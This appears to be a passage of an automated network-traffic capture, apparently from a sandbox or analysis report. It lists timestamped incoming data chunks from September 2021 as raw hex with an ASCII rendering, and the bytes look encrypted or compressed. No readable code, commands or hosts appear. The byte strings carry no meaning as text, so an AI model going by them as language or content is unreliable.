                                          Data Ascii: [qXWdsfaW1!LHqI-_dBAFmOJ)SW03k%CRdZ}o%om| (-DYn9VD7K6Y&s}]snx^DnO@M.,&DLh"un=(VkmI`GaNCJ?Z m52nRV1MRC`
                                          2021-09-28 06:58:06 UTC159INData Raw: 2e 32 c4 14 3c e0 eb f5 c1 3c 7e ca a3 1f e9 08 9f 30 b4 8f 1c 1c 11 9f db 10 ff 6e 36 71 89 84 de 93 d6 52 32 f9 a6 42 cf 0e 6c 2f 21 21 ca 40 aa 87 7d 67 7d 0e cc c7 26 78 45 94 c7 4c cf c4 0a 95 fe 48 de e8 9b 9d e3 09 a1 5c ea 74 37 aa 7b e7 89 e7 fd 12 9d 49 53 b6 a5 87 54 ec 57 7f b4 7d e4 ab 0f 0a b2 f7 7f 4c 98 89 c1 56 76 05 a1 54 5d ba 02 47 30 ce 7c 11 d1 0e 93 a5 66 09 21 35 43 c2 a9 ef 38 74 04 1a 73 14 6c 70 ae a2 3c 5c e1 1d 9b d2 bd d4 86 5e f0 20 2b 70 8c a7 3d a5 f4 90 54 db a7 b3 a1 be 5c 3e 67 89 59 cd bc 5f 93 d8 b2 c5 3b 89 1d 84 ac 57 d4 52 b8 d8 83 50 8b 7a cf 16 14 50 6f 65 54 60 a7 bc bd 08 2f a8 d9 40 88 21 58 4b 27 bf 24 d3 e7 f5 9c 88 2c 53 e1 59 9a 7f ac f3 af 0b 73 36 8d 4d 59 21 34 cf 08 1a 9a 15 d3 8f 86 e5 e0 c8 15 bd b3
                                          Data Ascii: .2<<~0n6qR2Bl/!!@}g}&xELH\t7{ISTW}LVvT]G0|f!5C8tslp<\^ +p=T\>gY_;WRPzPoeT`/@!XK'$,SYs6MY!4
                                          2021-09-28 06:58:06 UTC160INData Raw: dc 82 61 b4 3c 98 03 ec b4 e2 dc 72 be a5 f1 23 3e a2 21 c9 9a 06 c0 bb e2 08 6a ac bd 07 17 00 8a c2 ec 29 56 51 0d 56 77 84 aa 28 d0 a9 88 e4 25 27 0d c8 03 ac 0c 09 af e2 52 20 5c fc a2 4e f1 e8 5d c2 59 2b ed 65 8a 58 bd b3 02 dd 5e 2d 66 9f 90 5f e9 36 2f bf 9c 47 60 b4 85 8f 81 9a 56 62 57 a1 89 20 b9 c0 1f 31 01 4b 74 79 f1 9d 02 fa 17 57 60 90 4b 74 7f 80 70 6b 0c d9 5c d5 74 f7 b7 52 93 8e cf 61 fa ef 5b ef 75 d0 f8 52 e7 0f 70 79 83 3e 4c cc 83 7a 29 be fb 08 34 f3 d7 f3 a7 94 1c 4f 6b ca 22 c6 41 43 9f 80 d8 25 b8 81 1f c1 05 99 be c9 ea 58 70 95 e6 ca 88 1b 09 4d 67 9d a2 93 89 a9 87 56 99 e6 39 bf 50 7c 40 01 c9 2f 5d cb 6a a8 6d 1f 41 42 0a 1f cc f8 64 28 8d ac c5 de d8 5e c9 8d bb 44 58 d1 7a 97 26 96 8f cf 25 d5 a4 3c 0e 72 8b c3 4c 72 f9
                                          Data Ascii: a<r#>!j)VQVw(%'R \N]Y+eX^-f_6/G`VbW 1KtyW`Ktpk\tRa[uRpy>Lz)4Ok"AC%XpMgV9P|@/]jmABd(^DXz&%<rLr
                                          2021-09-28 06:58:06 UTC161INData Raw: 0f dc 9b 0c 47 48 1e 1d ba 85 54 37 e4 77 c6 b3 b6 9b 42 cf 7f 36 32 52 63 9b 80 32 84 da 12 8b d5 9b 5a 03 7d fa 0f 7c 1f 19 fc 30 30 b9 02 c0 9a 87 c6 cd 3c 95 56 3e 46 8f 0e f4 3e 13 9b d3 10 8b 9c a2 bb 8c fa 61 d7 c0 90 c9 0d ab a7 b6 4a c1 d7 35 0c 1a 74 78 93 dc f3 83 89 c1 11 39 f9 30 dd 67 92 e8 dd 6d d5 e7 26 40 d4 c6 d7 fa 42 55 82 7b 1d 21 36 14 89 01 a6 57 36 5d 21 a6 04 80 44 d0 e7 67 b5 db a3 94 5a 63 46 6b 25 36 b8 6f cf 7e dc b0 5b d5 58 b2 85 7f 85 42 dc 17 a4 79 72 3c e6 9f f9 bf d7 b7 0f 6b bb 80 d6 ce 98 cd fe 9d 80 ef 77 89 d8 4b b3 db 26 98 93 36 63 b9 ee 91 7d f9 17 0f ec 68 8e 86 ef ab 0d 80 b2 38 5f 9d f3 51 7c 5c 44 17 15 26 c7 54 46 95 d1 88 cb 41 ad 4b 20 fc ce 30 8d 56 fd f7 68 9d 23 2b 14 fe 13 cd 9e f7 ba cc 2e f9 9c 98 63
                                          Data Ascii: GHT7wB62Rc2Z}|00<V>F>aJ5tx90gm&@BU{!6W6]!DgZcFk%6o~[XByr<kwK&6c}h8_Q|\D&TFAK 0Vh#+.c
                                          2021-09-28 06:58:06 UTC162INData Raw: 2b 64 f3 d4 be 8d f1 85 fe be 1b 2f b3 cb 5f 97 12 55 27 38 77 a6 15 d2 8b d5 24 15 90 7d 11 60 cc 51 6f 17 22 38 dc b2 91 3d 54 bb 10 ee 21 69 bd 98 ab b4 52 12 3e c1 2a cc 26 46 1a 92 0f fe 54 d0 19 06 d9 5b 5b 11 43 3d 05 b0 b0 0d 5b c4 0f a1 d1 d6 c1 59 c8 51 44 b1 32 78 aa a7 11 a9 cd 35 fb bb ec 7f 24 46 be 8b 05 27 c5 fe 00 03 bd 43 b8 f2 e7 d7 d6 d5 7b de ec 93 12 98 01 a4 9a 8d 98 c7 71 73 40 44 65 98 d0 15 3c 6e f5 eb 4a 43 55 b5 31 25 a0 8f 8a be bb 58 89 2a 47 4f 44 da ec 36 8d 10 a7 5a 55 38 87 23 ec 8a e8 70 a9 22 12 e0 d5 72 8c 9a b6 aa 9c 23 8e 3e db bd d8 a8 33 87 01 90 5c 69 f7 20 10 33 58 d5 ce c6 88 a3 a6 3a f4 5a ba 27 13 a2 2c a4 61 28 8a 71 9f 24 ee 54 d9 81 c9 58 75 13 56 30 52 b2 8e 5f 2a 3e 27 78 75 1d 78 ce fe 6e 90 95 54 aa 07
                                          Data Ascii: +d/_U'8w$}`Qo"8=T!iR>*&FT[[C=[YQD2x5$F'C{qs@De<nJCU1%X*GOD6ZU8#p"r#>3\i 3X:Z',a(q$TXuV0R_*>'xuxnT
                                          2021-09-28 06:58:06 UTC163INData Raw: 2f 1b 62 c1 94 52 f5 63 a3 0b 7a ab 27 81 da c0 12 e2 89 2a 5e bd aa 1a ee 80 a8 6b d8 65 f5 5e cc 9c 6e 7d ae 76 ce d5 c8 24 3f b1 48 2b 85 77 e6 0b 14 61 69 d7 ac 29 37 1b bc aa 7d f0 c4 6d 2e 3b f9 0c 23 bb 2e 69 69 dd 2d 60 20 00 c1 17 73 ab 92 ec e0 47 00 13 9e 45 45 b3 1d 79 59 de fd 8c 90 16 6a fc 5b 30 34 bd b6 f7 25 93 c8 ae 71 87 9e 1d 59 07 66 a4 6e 2e 99 ed 75 02 06 15 0b fe c3 32 d0 da 5b 2d cf b6 ca 1b 77 09 b8 81 40 89 f3 d6 e5 b1 4e fd 4a 40 30 be de 6a b4 b6 23 36 7f a3 c7 45 0d 54 fb 57 3e 43 3a 64 96 82 c5 d4 4e 11 81 f4 fb 5a 5c 7e 8b 52 df e6 bf 48 3c df af 53 94 37 07 32 f0 e0 e3 d2 f1 28 1f f1 92 6c 11 15 72 6c f6 2a b4 0c 96 a1 5e 45 c0 33 dc ca b8 56 19 93 e1 5a 19 ca fd 91 ff 4d a6 f3 73 9e e4 16 e4 43 87 77 05 b8 f3 fe dd d9 ce
                                          Data Ascii: /bRcz'*^ke^n}v$?H+wai)7}m.;#.ii-` sGEEyYj[04%qYfn.u2[-w@NJ@0j#6ETW>C:dNZ\~RH<S72(lrl*^E3VZMsCw
                                          2021-09-28 06:58:06 UTC164INData Raw: 6b f8 20 10 27 03 d5 ce c7 f3 55 a6 81 fc 58 bb 27 1a ca 28 a4 4f 29 88 8b b5 9f ef 56 d8 81 c9 bf 6b 13 56 2d 5a b8 8f e4 66 3c 26 78 7c 8a 79 ce f4 6f 92 83 55 76 c7 37 8b 80 7c 3c e0 f9 9a 3e a0 51 5b 61 34 d1 d7 f0 eb c0 d9 f0 59 13 da ac 32 c5 3a 3f 79 6a 58 a3 19 34 f0 e7 ec 8e 20 33 3a 51 8a a7 46 39 3c c1 8e 16 e3 72 61 cf c2 13 c9 85 ea f2 e3 2f f1 9f 9e 5b 00 5d be bd 8b f6 e3 ac f2 ce 49 fd bf 8d a9 13 f6 93 22 20 35 7e 60 f2 c4 40 4b 7c c5 bf a7 ab 52 45 be 17 57 48 33 95 f4 ad e8 f1 0d 74 b0 e0 bd 26 9d 1e c9 3f cc a2 c5 f8 21 e7 fd dc 7b f6 ae 7c 91 a4 27 a8 9f c9 2b 24 8c b9 18 57 2b 9d c9 e5 7d 21 4d 14 40 7b bc b8 08 19 80 91 f8 33 1c 6d e6 37 88 1d 26 8f d1 14 01 74 c2 a7 51 8d c1 71 f1 66 18 d9 79 6e 51 88 81 cc 06 f7 d5 b7 41 45 84 24
                                          Data Ascii: k 'UX'(O)VkV-Zf<&x|yoUv7|<>Q[a4Y2:?yjX4 3:QF9<ra/[]I" 5~`@K|REWH3t&?!{|'+$W+}!M@{3m7&tQqfynQAE$
                                          2021-09-28 06:58:06 UTC166INData Raw: 96 f7 a8 b8 a6 31 07 1e b9 b3 12 54 cb 75 24 2f 71 49 43 97 e9 64 37 e8 f6 db 82 68 72 4b 2c e1 49 dc 87 b8 1c f8 00 e5 86 36 98 e5 5b c0 0f 47 80 02 f5 6e a2 1d b8 cf 77 af 0f e3 7c 97 fa 71 87 e0 ae 80 15 d8 cd 57 99 57 43 fc e5 d5 56 1a cf a7 d0 65 17 90 74 d7 cb 61 8c f6 89 44 d4 fd 45 a1 bb fb b5 57 fe 43 6b c2 b0 c5 72 9b a0 8d d2 63 d5 d2 a7 3b ee 60 3b 46 73 7e a1 18 45 c8 16 73 56 91 ea 11 76 d2 50 6f 0b 29 2e c2 b3 e7 9e 7b 98 21 db 17 f8 8a b2 a9 e2 d2 85 3b f4 55 9a a6 5a b1 24 10 a8 f7 6a 18 33 ca 89 db 43 14 3d 1a e6 13 a8 2e 83 79 99 36 76 c6 6c d7 07 98 60 30 4d a5 a1 17 0b e8 61 ac a4 28 e8 25 08 cd 64 85 3b 2e 9c 1f 55 1e c5 d5 d3 9a 81 56 87 7c 90 f3 c5 90 6e 00 e0 d2 64 bb 2b 7f 33 5f 12 e5 0a d3 68 23 2e b1 ea 41 0d 4a e3 b8 bb a2 c1
                                          Data Ascii: 1Tu$/qICd7hrK,I6[Gnw|qWWCVetaDEWCkrc;`;Fs~EsVvPo).{!;UZ$j3C=.y6vl`0Ma(%d;.UV|nd+3_h#.AJ
                                          2021-09-28 06:58:06 UTC167INData Raw: 21 1e 28 9d d5 ff 44 6f 4a 19 91 7e 8e ba 0e d4 3c 90 68 33 1a 20 70 2c b8 1d 21 8f cd 66 36 76 c4 a6 97 c1 f2 6d f5 64 4b de 4b bf 67 88 16 cc 7a b5 d2 a9 d4 4e bc 26 e1 eb 71 61 9c a8 74 6f a3 4b 62 9d b4 99 ef 73 ce 51 12 db 7f d1 9f f2 b0 06 f4 e3 09 f6 bd 86 a4 87 87 95 60 93 1c e5 2a f6 37 82 00 58 ac 39 34 70 56 5f 7d e3 4c b1 cf 3f 99 31 ae c8 dc 36 c0 9f 05 54 ef 82 27 70 81 a2 af 45 5b 6b 5f de 6a d9 47 b8 59 d0 87 26 10 7d 84 56 f8 a7 6b a4 3e 12 09 5d e4 d3 32 31 8c 01 a3 a7 ec c2 6c 3b 34 3e 10 25 2c 6c 68 45 fd 2b 7c 11 30 ed 09 75 6f 24 f4 27 5b 16 84 61 55 82 af 1b ee d4 f2 80 8e 9a 81 b8 db ec 17 3f 28 1d fa 27 92 cb b1 53 b2 9c 1c 5f c3 d9 93 2c 1c 93 bf 1c 1d 6a 35 29 69 51 fc 4f c5 79 ba 72 38 53 04 55 9e 16 16 d9 83 d0 d5 94 e0 fc f7
                                          Data Ascii: !(DoJ~<h3 p,!f6vmdKKgzN&qatoKbsQ`*7X94pV_}L?16T'pE[k_jGY&}Vk>]21l;4>%,lhE+|0uo$'[aU?('S_,j5)iQOyr8SU
                                          2021-09-28 06:58:06 UTC168INData Raw: ee 72 ae f2 b9 7f 0a 51 bb 3b 14 27 e5 b1 00 03 9e 01 c5 9d 12 d6 50 dc 6a de 94 f8 10 98 01 ae dc 32 ac f9 21 7e 51 44 71 0e d1 26 3c 78 27 eb dc 42 b8 bc 29 24 cc fe de be bb 58 06 2b d0 4e 51 d5 fe 36 91 64 a7 5a 53 38 91 23 8e 89 40 7a 2a 22 7a 95 ec 72 8c 9a b9 aa 0b 22 66 34 ce bd e2 de 33 87 0a 91 4a 69 ab 27 00 38 0f d5 d6 b1 f1 a3 a6 3a eb 5a a6 20 c5 aa 3b a4 13 5f 8a 71 b5 24 f8 54 1c 80 86 53 63 13 aa 48 5a b2 8e 5f 71 3e b0 79 22 16 6f ce 80 17 90 95 54 aa d0 35 97 87 b4 2b f0 f9 9a 5d a0 48 5a bd 23 d3 13 f1 1f 57 ca f0 c5 70 da 8a 33 1b 2d 3a 8f 6b 47 be 2f 34 f0 fa ec a7 a1 d4 2d 74 1d b6 60 f3 2f c1 8e 0b e3 5b e0 22 d2 31 5e 84 db b6 d5 2f ed 01 9e 6d 01 b2 a9 bf 2b f5 05 5e ec ce c1 63 bf b5 a8 e5 e1 91 f0 27 ee eb 7b f2 f4 c5 49 44 c4
                                          Data Ascii: rQ;'Pj2!~QDq&<x'B)$X+NQ6dZS8#@z*"zr"f43Ji'8:Z ;_q$TScHZ_q>y"oT5+]HZ#Wp3-:kG/4-t`/["1^/m+^c'{ID
                                          2021-09-28 06:58:06 UTC169INData Raw: 81 88 dc 15 d5 c3 2c 19 1a bf 1c ea 25 93 c8 ad 12 a1 fc 16 90 08 fd 83 2e 1d 93 ed 18 0d 2e 30 58 f5 2c 13 6b c3 36 b7 73 99 54 02 44 11 57 ae 58 90 f4 d6 20 bd d0 e4 40 40 b5 ba 78 48 ad b6 b7 2c 8f 3e cd 45 80 45 74 50 af 42 7f 42 76 98 ef 4f b7 0b 44 ee ec 5a 9a 76 72 56 fc e6 8e f4 68 ef a9 53 ae 32 83 00 10 ef 83 f0 99 84 19 f1 ad 44 c5 0f 26 6b b7 27 ec 11 c0 00 7a 61 68 00 cb ca e1 75 10 9e c2 5a 52 73 38 8b f9 4d ea d0 21 85 69 06 fb 59 93 e7 03 b8 70 f4 8c ea d4 3d 3a 49 46 8a 22 95 6f d1 60 7d 81 40 fc be c4 f1 70 0e 5e 17 55 57 10 82 aa d6 f4 b4 76 77 f0 9d 05 bd f7 ef 5a 82 6b 59 31 dc f5 e8 f1 3a 4e a5 dc a1 c5 e5 8c eb 18 d2 55 53 f5 b7 21 46 60 27 41 63 6a a0 04 d5 12 84 48 57 e5 d4 10 60 cc 51 79 17 ea 39 8e a3 c1 09 a2 21 3e dd 11 5a 9d
                                          Data Ascii: ,%..0X,k6sTDWX @@xH,>EEtPBBvODZvrVhS2D&k'zahuZRs8M!iYp=:IF"o`}@p^UWvwZkY1:NUS!F`'AcjHW`Qy9!>Z
                                          2021-09-28 06:58:06 UTC171INData Raw: c7 3b de 9e 6c 44 d5 38 89 93 0a e3 5b 60 31 c3 86 c8 f5 e2 90 c2 2b ef 83 9e 6d 01 a1 bf 83 8d 06 f2 76 f6 8a 6a e1 bf b5 a8 f6 f7 c3 24 96 31 c3 61 8e e1 40 49 44 c4 54 a6 5a 50 55 b5 4f 76 20 15 89 f4 92 e9 1a 0c e1 b1 55 a6 16 98 fe ef 23 cc e1 c4 e9 23 a6 cf 3a 79 4e 8b 34 b6 b8 27 e3 9e d2 29 d0 8d 72 03 36 2e 55 ee f9 7d 6d 4c 0a 42 1f ba 48 19 fe ab 91 d2 2f 1c 20 e7 3e 8a 88 26 a2 cd 4b 04 b4 e8 a7 53 c0 c0 7c f3 92 18 39 7b 97 61 6c aa cc 04 aa d4 ba 43 90 b1 d4 f6 c1 6d e6 89 ab 72 6f 55 59 50 0f b4 69 69 58 fd 39 3b da e8 d0 8a cd b6 1f 56 12 08 de bb 7e 02 87 94 97 66 80 8b 73 38 22 2d a8 1c d3 8d 3a 32 70 c1 4d 4f ba 4b 41 1a 14 8a 9b 9c c9 c0 31 f2 8e 03 eb bb 75 25 58 87 56 5e 45 69 69 59 cd 9c 76 55 4a 4e fa d5 1d 15 7e 82 56 2b b1 78 48
                                          Data Ascii: ;lD8[`1+mvj$1a@IDTZPUOv U##:yN4')r6.U}mLBH/ >&KS|9{alCmroUYPiiX9;V~fs8"-:2pMOKA1u%XV^EiiYvUJN~V+xH
                                          2021-09-28 06:58:06 UTC172INData Raw: c0 a9 f3 e4 b0 d7 42 07 0c dc a1 c5 e3 92 43 80 4b 60 11 d3 33 7c ee 60 27 41 65 74 16 39 63 cd d2 6e ef d4 7c 10 60 cc 57 67 d6 0f 84 d8 e6 e7 cd 3f 8a 3e dd 11 5c 84 86 b7 fd 53 47 3a 39 0f cd 26 46 b6 17 07 cd 6b 6e 19 53 d5 db 1d 10 13 08 05 b6 9b 01 21 9e 78 99 b6 9d 87 58 c8 51 18 0e 3a 08 b4 89 0f ff ee 36 e8 f3 a8 7f 24 57 ca 72 20 a1 29 85 00 b7 bc 01 d4 9d 85 d1 ce ef 5e cd ec c4 10 14 4b af cd 32 3b eb 78 ea 41 cb 7b 35 d1 a6 70 79 31 eb 4b 52 55 22 39 92 a4 d8 de 66 f7 59 10 2b 47 5c 07 48 ed 80 ef 47 a7 86 1e 39 87 23 19 99 e8 e7 3f be 16 b7 ec 5a c2 9b af aa 9c 32 8f a9 da 79 c4 ff 33 33 28 91 5c 69 f9 26 08 09 3d c6 ce 91 f1 cb e8 3b fd 5a ba 36 1a 35 2d 77 51 7f 8a 85 fb 25 ee 54 d8 92 c9 cf 75 f9 54 67 5a ba dc 5e 67 3e 27 7e 64 27 5d d2
                                          Data Ascii: BCK`3|`'Aet9cn|`Wg?>\SG:9&FknS!xXQ:6$Wr )^K2;xA{5py1KRU"9fY+G\HG9#?Z2y33(\i&=;Z65-wQ%TuTgZ^g>'~d']
                                          2021-09-28 06:58:06 UTC173INData Raw: 12 d0 40 82 18 d1 be 3b 32 70 d7 5e d8 e0 7b 95 7a 3e 3a bd a9 c8 c0 31 e4 9d 94 55 fe a1 46 72 ef 2d 6a 44 69 69 4f de 0b d9 0a 9e 2b d0 cd b1 23 7f 82 56 3d a0 ef a7 49 36 15 5f 87 41 35 31 1b 00 b6 b8 7d c3 ea 15 52 3c a2 b5 ba 6d 7b 47 fd 2b f7 17 b9 cb 79 75 5b b5 e6 25 5d 06 12 60 59 87 33 3f 0e d5 04 13 89 9a 16 b9 ce ee 0a 38 78 38 92 25 3f 59 ac 54 a2 9e 1b 5f 1b df 90 2e 64 93 35 8f 0c 68 33 29 f8 50 d8 4f c9 5c 54 73 75 c2 03 55 09 17 8d de 07 d0 fc b1 e6 d0 3c d7 41 b3 a2 42 6b be 21 93 1e c6 dd cd 55 18 44 67 50 38 42 99 51 54 aa e6 ad b7 0f dd ef fd 5a 86 77 f4 c1 d8 8c 7f 13 68 bf 30 52 bf 32 47 17 f6 77 a7 69 94 61 19 7d 37 45 d4 0f 74 6d 31 b0 c8 a3 b5 db 7a 01 f3 01 da ca 76 75 4d 19 e6 88 fb ab 38 63 64 4c fb d0 b6 85 e2 0a d9 8b e2 3e
                                          Data Ascii: @;2p^{z>:1UFr-jDiiO+#V=I6_A51}R<m{G+yu[%]`Y3?8x8%?YT_.d5h3)PO\TsuU<ABk!UDgP8BQTZwh0R2Gwia}7Etm1zvuM8cdL>
                                          2021-09-28 06:58:06 UTC175INData Raw: a7 a8 1f 71 0b 91 5c 69 ef 20 0c 34 12 f9 b3 c6 71 54 a7 3a fd 5a bc 3f 20 87 0f 87 32 28 12 86 b4 24 ee 54 de 99 f3 7d 25 3f 2b 30 ca 4a 8f 5f 67 3e 41 7b 0a 0d 6b ce 89 6e 4c 6c 55 aa c6 35 8d 98 46 05 27 f9 e7 23 14 6a 5a bd 35 d3 d1 e8 d1 79 ce f0 24 0e da 70 32 1b 3b 3a 7a 62 11 bf 71 35 8d fa d8 5d 20 d4 3b 54 89 bf 10 f2 f8 c1 f3 0b a3 a1 61 22 c3 11 ca 8d 25 b3 8b 2e 8c 82 ea 97 00 b2 bf bf 88 fe 3f 55 36 ce 34 e0 3f 4f a9 e5 f7 91 20 28 d4 ea 28 f3 b9 41 fd be c5 47 a6 a9 51 4d 57 66 b6 48 4e 88 34 68 e8 09 0c 76 b3 e8 08 1f d1 1f b4 22 38 1b c5 fa 23 e5 fe d4 ba 47 4b 7c ec b9 da 19 9f c1 29 26 8a b1 22 39 56 9a b4 f8 61 96 4d 19 42 79 aa b8 9f d5 dc bd 85 2e c8 db e6 2d 8a 1f b6 8f d2 61 80 58 bf a6 7c 3c c1 6f f3 64 8f d9 ee bc 87 8a fc cd 40
                                          Data Ascii: q\i 4qT:Z? 2($T}%?+0J_g>A{knLlU5F'#jZ5y$p2;:zbq5] ;Ta"%.?U64?O ((AGQMWfHN4hv"8#GK|)&"9VaMBy.-aX|<od@
                                          2021-09-28 06:58:06 UTC176INData Raw: 72 eb ab 53 bf 32 d1 01 dd e4 40 f2 cc 1b 2f f5 af 44 d4 0f e2 6c b3 3d 2f 13 ed a1 28 65 6a 00 da ca e0 74 18 8a 01 58 a3 d1 55 8f fb 4d fb d0 20 84 a3 0d 38 5b ba 44 8a bc 72 f4 9d ea 5e 3a 38 5d 85 88 eb b7 ca d5 62 7d 87 58 50 9b d8 d1 b3 0c 9f b3 94 53 12 82 b9 d6 f5 b5 25 63 33 9f 9c 1b 2b eb 58 82 7d 59 30 dd c9 c2 31 38 3f 0d 2b a5 c7 e5 9a eb 19 d3 be 46 35 b5 44 ef 72 22 43 63 7c a0 8e d2 96 a7 88 55 ec 7d 3d 65 ce 51 6f 17 b8 38 db b7 01 0b 07 8b 76 d8 13 5a 8c a1 3d b4 9b 33 dc c3 37 cc 42 43 b4 11 0f fe e1 ae 21 03 33 dd 26 11 93 0d 07 b0 93 5e b9 b6 cf ea 50 a7 bc 59 54 54 1a 08 32 78 2c a7 73 ac 08 70 d3 f2 10 7a 26 46 d2 32 93 27 3b fe e6 01 e3 01 00 98 87 d7 d6 d5 ed de 60 96 f6 9a 7c ae 3d 37 39 f8 78 7d d6 44 8f 52 37 24 41 78 3a ed 49
                                          Data Ascii: rS2@/Dl=/(ejtXUM 8[Dr^:8]b}XPS%c3+X}Y018?+F5Dr"Cc|U}=eQo8vZ=37BC!3&^PYTT2x,spz&F2';`|=79x}DR7$Ax:I
                                          2021-09-28 06:58:06 UTC177INData Raw: e1 9e c1 29 b0 8c 0d 0c fa 2c e0 c9 c3 72 6f 4c 19 42 ef bc b5 0b 32 a9 ec f8 72 13 22 e7 2d 8a 89 27 87 c7 87 06 09 c2 db 5c c2 c0 6f f3 f2 19 bf 7a 5b 63 f5 81 53 0b a8 d4 a9 43 d9 85 2f f0 0d 6f 1b a5 6a 7d 6d 55 4a 50 09 b2 09 7b 94 ff 00 14 3a e7 d2 8a de b6 80 63 aa 0e 12 b9 fb 33 85 84 95 66 93 8b 72 39 4e 32 64 1e 22 bf 1e 22 72 c1 5e 4f 77 4a c3 1c d8 88 4e a8 8e d0 33 f2 9d 03 c2 bd 81 30 94 85 df 6b 23 79 6b 59 de 9c 4e 54 03 47 36 d7 5c 22 f7 92 54 2b a0 78 30 38 3c 65 b9 f5 ac 34 9b 0b 02 b0 b8 ea 54 6d b4 3d da 14 58 bb a6 6b 45 fb 2b 60 80 23 b7 0b 93 a9 58 e7 c9 4d 04 13 60 45 16 a9 5f 62 33 c2 ff 88 97 07 bb c8 ee 16 a9 bf 90 ee c3 91 b6 ad 7a b3 9c 1d 5f 07 4e 83 3c 3d 75 ef 66 0d 27 22 2b fe 50 1c d8 c3 cf 29 95 9b 29 02 25 18 15 8b de
                                          Data Ascii: ),roLB2r"-'\oz[cSC/oj}mUJP{:c3fr9N2d""r^OwJN30k#ykYNTG6\"T+x08<e4Tm=XkE+`#XM`E_b3z_N<=uf'"+P))%
                                          2021-09-28 06:58:06 UTC178INData Raw: 59 bd f6 f6 f1 4a f4 ce 49 e0 29 b5 50 e7 11 93 5e 20 01 ff 63 f2 c4 41 df 44 37 52 40 ab 2f 45 e8 73 74 48 33 88 62 92 cb 0a ea 74 cd e0 c5 2a 9a 1e c9 22 5a e1 32 ec c5 e7 80 dc e1 72 89 7c 91 b9 b1 e3 e5 c2 cf 24 f1 a9 a3 0a 2c 9d c9 f8 eb 6d 7f 0e a4 7b c1 b8 d5 c2 a9 91 f8 2e 8a 20 42 2e 6c 1d 5a 8f 2e 77 06 74 c2 a6 c5 c0 9d 78 15 66 64 d9 58 aa 63 88 81 cd 92 aa 1b aa a5 4d f8 24 a5 fc 6f 66 a5 aa e4 6f 88 5d b6 9d cf 99 1b 65 ff 7d 14 db 7e d0 93 da 50 14 1e e2 9d e3 b9 86 33 86 02 97 b8 8a 6d e6 44 f4 94 95 1e 5f bf 3b a4 70 82 5a a9 e3 37 b1 cd 29 88 33 a8 c8 56 31 eb 86 e5 56 c0 85 d3 65 85 a2 6b 44 ff 69 34 da 7a da 29 ba 56 c8 d7 21 22 7f 14 56 c7 bf 9e a4 45 12 4b 47 f5 d1 34 31 8d 00 11 bc 0c c0 10 31 6c 24 14 25 bb 6d ed 47 ed 0a 86 14 5e
                                          Data Ascii: YJI)P^ cAD7R@/EstH3bt*"Z2r|$,m{. B.lZ.wtxfdXcM$ofo]e}~P3mD_;pZ7)3V1VekDi4z)V!"VEKG411l$%mG^
                                          2021-09-28 06:58:06 UTC179INData Raw: 65 d2 8a a4 6c 57 91 7d 86 60 e8 56 89 15 53 38 b9 90 e5 09 7a 8b a8 dd c0 5b 6a a3 d6 b4 d5 30 38 c1 4a cc b0 46 ec 16 e9 fc 0a ae b0 24 d7 df 5b 11 85 08 fb b1 75 5c 52 b6 ac ed b4 a5 c1 59 5e 51 c3 0f d4 7a c7 a7 fa 8b ec 72 ae f2 3e 7f 5e 44 34 30 78 27 25 f1 02 03 9e 01 42 9d 8c dd 30 d7 06 de c2 b0 12 98 01 ae 5b 32 9c fa 9e 7f 3d 44 35 41 d3 26 3c 78 a7 eb 01 57 b3 b7 45 24 d2 ac dc be bb 58 86 2b 96 4d e1 dd 91 36 65 33 a5 5a 53 38 11 23 8b 9c 0e 72 43 22 a4 c3 ee 72 8c 9a 39 aa 67 21 69 3c a6 bd 02 8b 31 87 0a 91 ca 69 0f 35 f6 31 65 d5 34 e5 f3 a3 a6 3a 6b 5a 9f 24 fc a0 51 a4 53 0c 88 71 b5 24 78 54 21 97 2f 5a 09 13 68 14 58 b2 8e 5f f1 3e 59 7b 9a 1f 05 ce 94 4a 92 95 54 aa 50 35 bd 97 9a 22 9a f9 18 07 a2 48 5a bd a3 d3 7f f3 0d 5e a0 f0 fd
                                          Data Ascii: elW}`VS8z[j08JF$[u\RY^Qzr>^D40x'%B0[2=D5A&<xWE$X+M6e3ZS8#rC"r9g!i<1i51e4:kZ$QSq$xT!/ZhX_>Y{JTP5"HZ^
                                          2021-09-28 06:58:06 UTC180INData Raw: 07 1a 70 87 a2 6b d2 69 9e 5c 38 9e a5 54 1e 71 d2 d5 21 22 e9 82 11 1a 46 7a db 38 d4 4f 5d f7 d1 34 a7 1b 32 b6 5e e8 bf 6d d6 09 3e 16 25 bb fb 7b 5b c9 cd 62 6b 23 e6 20 77 ab 25 e7 b3 5d 5a 15 86 47 fd a9 30 56 d7 c0 82 88 0c 16 1c fa 08 14 42 bf 50 c5 27 93 cb ad c2 a2 18 1b b9 05 a5 83 40 32 91 ed 1b 0d fe 33 d6 ca b6 1e 33 c3 f6 02 71 99 54 02 c3 09 58 8a 38 92 ac d6 24 b0 d2 e4 40 40 25 a2 f1 6b 58 b4 ef 2c 31 8b cf 45 80 45 f1 50 9a 42 7f 4f 2e 98 30 fb b5 0b 44 ee 6b 5a a1 76 12 54 a4 e6 4f 5a 6a ef a9 53 29 32 93 00 10 e2 db f0 86 2b 1b f1 ad 44 42 0f 29 6b d7 25 b4 11 c9 91 78 61 68 00 4c ca 77 76 ab 8c 9a 5a a4 e1 3a 8b f9 4d 6d d0 68 83 04 14 a3 59 5c 74 01 b8 70 f4 0b ea b5 38 57 5b 1e 8a 2a 87 6d d1 60 7d 11 58 ca 91 31 f3 28 0e 3f 83 57
                                          Data Ascii: pki\8Tq!"Fz8O]42^m>%{[bk# w%]ZG0VBP'@233qTX8$@@%kX,1EEPBO.0DkZvTOZjS)2+DB)k%xahLwvZ:MmhY\tp8W[*m`}X1(?W
                                          2021-09-28 06:58:06 UTC182INData Raw: 2a 8a 71 b5 b2 ee 3f f9 67 cb 25 74 de 6c 32 5a b2 8e c9 67 2d 22 9e 7e 60 78 20 ce 6c 90 95 54 3c c6 bd af 66 7e 5d e7 f6 a1 21 a0 48 5a 2b 35 97 d2 16 e9 21 dd c0 62 0c da 8a 33 8d 3b c5 5e 8c 5a cf 38 65 cb f8 ec a7 21 42 3b 3a 8f 51 44 82 38 b3 b5 09 e3 5b 60 b4 c3 be e4 63 e8 c7 c2 bc ca 80 9e 6d 01 24 bf 27 8e 10 e1 21 f6 7a 72 e2 bf b5 a8 73 f7 67 13 c6 37 94 61 27 ff 43 49 44 c4 d1 a6 79 57 a3 bc 18 76 bf 08 8a f4 92 e9 9f 0c 56 81 06 bf 41 98 07 f5 20 cc e1 c4 6c 23 1f f8 3a 79 19 8b 46 ad bb 27 e3 9e 57 29 6c bd 4f 1a 61 2e c6 f5 fa 7d 6d 4c 8f 42 4c ba 5e 0a a9 ab ec c4 2c 1c 20 